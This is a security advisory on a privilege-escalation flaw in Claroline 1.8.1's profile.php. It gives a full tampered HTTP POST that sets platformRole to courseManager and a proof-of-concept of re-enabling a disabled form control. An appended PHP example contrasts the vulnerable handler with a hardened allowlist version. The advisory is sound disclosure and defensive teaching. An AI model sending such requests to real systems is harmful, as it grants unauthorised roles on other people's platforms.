
Claroline e-Learning 1.8.1 Privilege Escalation Vulnerability

Posted on 17 August 2013

<pre>Claroline users can assign themselves their platform role, leading to possible privilege escalation

Description:
Due to insufficient permission checking in profile.php, any user can assign him- or herself to any organization by issuing a single HTTP request.

#######################################################

http://%targetsite%/claroline1811/claroline/auth/profile.php

POST /claroline1811/claroline/auth/profile.php HTTP/1.1
Host: %targetsite%
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://%targetsite%/claroline1811/claroline/auth/profile.php
Cookie: javascriptEnabled=true; 7e3da37302f0c5887c5a23ec673c8fda=0mmhmtdunecvb0o9q34k340qd0; bd84f0e7e57f5bde1a0f3d525d0f3511=h0ifng3c6of9ets5hihsr7jgg5
Content-Type: multipart/form-data; boundary=---------------------------114782935826962
Content-Length: 1443

-----------------------------114782935826962
Content-Disposition: form-data; name="cmd"

registration
-----------------------------114782935826962
Content-Disposition: form-data; name="claroFormId"

520df680057be
-----------------------------114782935826962
Content-Disposition: form-data; name="csrf_token"

0000token00000x0token000000token
-----------------------------114782935826962
Content-Disposition: form-data; name="uidToEdit"

9
-----------------------------114782935826962
Content-Disposition: form-data; name="lastname"

Tom
-----------------------------114782935826962
Content-Disposition: form-data; name="firstname"

Sawyer
-----------------------------114782935826962
Content-Disposition: form-data; name="officialCode"

TMSW
-----------------------------114782935826962
Content-Disposition: form-data; name="username"

littletomsawyer
-----------------------------114782935826962
Content-Disposition: form-data; name="email"

-----------------------------114782935826962
Content-Disposition: form-data; name="phone"

-----------------------------114782935826962
Content-Disposition: form-data; name="skype"

-----------------------------114782935826962
Content-Disposition: form-data; name="platformRole"

courseManager
-----------------------------114782935826962
Content-Disposition: form-data; name="applyChange"

OK
-----------------------------114782935826962--

HTTP/1.1 200 OK
Date: Fri, 16 Aug 2013 09:54:24 GMT
Server: Apache/2.2.16 (Debian)
X-Powered-By: PHP/5.3.3-7+squeeze16
Expires: Thu, 19 Nov 1981 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 2920
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

########################################################

!! PoC: at auth/profile.php, change the 'disabled="true"' status of the button:

<dl>
  <dt> Platform role </dt>
  <dd>
    <input type="radio" checked="checked" value="student" id="student" name="platformRole"><label for="student"> (student)</label><br>
    <input type="radio" disabled="disabled" value="courseManager" id="courseManager" name="platformRole"><label for="courseManager">(teacher)</label><br>
  </dd>
</dl>

Systems affected: Claroline 1.8.x
Vendor status: Unknown
</pre>
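The root cause the advisory describes is a profile handler that trusts every field in the POST body, so a radio button that is merely `disabled` in the HTML is no control at all: the browser's form state can be edited and the server writes whatever arrives. The following is an added example, not Claroline's code, showing the trusting pattern beside a hardened handler that takes the actor's identity and role from the server-side session, only accepts a `uidToEdit` that belongs to the actor unless the actor is an administrator, and drops `platformRole` (reporting it as a tampering signal) for everyone else. The role names, the `platformAdmin` role, the field allowlists and the session layout are assumptions modelled on the request above.

```php
<?php
// Added example (not Claroline's code): server-side authorization filtering for a
// profile-edit handler like auth/profile.php. Role names, allowlists and the
// session layout are assumptions modelled on the request in the advisory.
declare(strict_types=1);

// Fields any logged-in user may change on their own profile (assumed allowlist).
const SELF_EDITABLE = ['lastname', 'firstname', 'officialCode', 'username', 'email', 'phone', 'skype'];
// Fields only a platform administrator may change, on any profile.
const ADMIN_ONLY = ['platformRole'];
// Assumed role names; 'platformAdmin' is hypothetical.
const VALID_ROLES = ['student', 'courseManager', 'platformAdmin'];
// Form plumbing that never maps to a profile column.
const FORM_CONTROL_FIELDS = ['cmd', 'claroFormId', 'csrf_token', 'uidToEdit', 'applyChange'];

/**
 * Vulnerable pattern (what the advisory describes): every submitted field,
 * platformRole and uidToEdit included, is trusted and written to the user row.
 */
function buildUpdateUnsafe(array $post): array
{
    $update = [];
    foreach (array_merge(SELF_EDITABLE, ADMIN_ONLY) as $field) {
        if (isset($post[$field])) {
            $update[$field] = $post[$field];
        }
    }
    return ['uid' => (int) $post['uidToEdit'], 'fields' => $update];
}

/**
 * Hardened pattern: identity and role come from the server-side session, the
 * target uid is checked against the actor, and privileged fields are dropped
 * (and reported) unless the actor is a platform admin.
 * Returns ['uid' => int, 'fields' => array, 'rejected' => array].
 */
function buildUpdateSafe(array $session, array $post): array
{
    $actorUid  = (int) ($session['uid'] ?? 0);
    $actorRole = (string) ($session['platformRole'] ?? 'student');
    $isAdmin   = ($actorRole === 'platformAdmin');

    $targetUid = (int) ($post['uidToEdit'] ?? $actorUid);
    if ($targetUid !== $actorUid && !$isAdmin) {
        throw new RuntimeException("uid {$actorUid} may not edit uid {$targetUid}");
    }

    $allowed  = $isAdmin ? array_merge(SELF_EDITABLE, ADMIN_ONLY) : SELF_EDITABLE;
    $update   = [];
    $rejected = [];
    foreach ($post as $field => $value) {
        if (in_array($field, FORM_CONTROL_FIELDS, true)) {
            continue;
        }
        if (!in_array($field, $allowed, true)) {
            // A non-admin posting platformRole is exactly the tampering the advisory
            // shows; log $rejected so it can be alerted on.
            $rejected[] = $field;
            continue;
        }
        if ($field === 'platformRole' && !in_array($value, VALID_ROLES, true)) {
            $rejected[] = $field;
            continue;
        }
        $update[$field] = is_string($value) ? trim($value) : $value;
    }
    return ['uid' => $targetUid, 'fields' => $update, 'rejected' => $rejected];
}

// Constructed sample: a student session and the tampered form body from the advisory.
$session = ['uid' => 9, 'platformRole' => 'student'];
$post = [
    'cmd' => 'registration', 'claroFormId' => '520df680057be',
    'csrf_token' => '0000token00000x0token000000token', 'uidToEdit' => '9',
    'lastname' => 'Tom', 'firstname' => 'Sawyer', 'officialCode' => 'TMSW',
    'username' => 'littletomsawyer', 'email' => '', 'phone' => '', 'skype' => '',
    'platformRole' => 'courseManager', 'applyChange' => 'OK',
];

$unsafe = buildUpdateUnsafe($post);
$safe   = buildUpdateSafe($session, $post);
printf("unsafe handler writes platformRole=%s\n", $unsafe['fields']['platformRole']);
printf("safe handler writes %s and rejects [%s]\n",
    implode(',', array_keys($safe['fields'])), implode(',', $safe['rejected']));
```

The point of the allowlist is that the decision of which fields are writable is made per actor role on the server, so the HTML `disabled` attribute becomes purely cosmetic; the `rejected` list is the place to hook a log line or alert, since a legitimate client never submits `platformRole` from the self-edit form.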
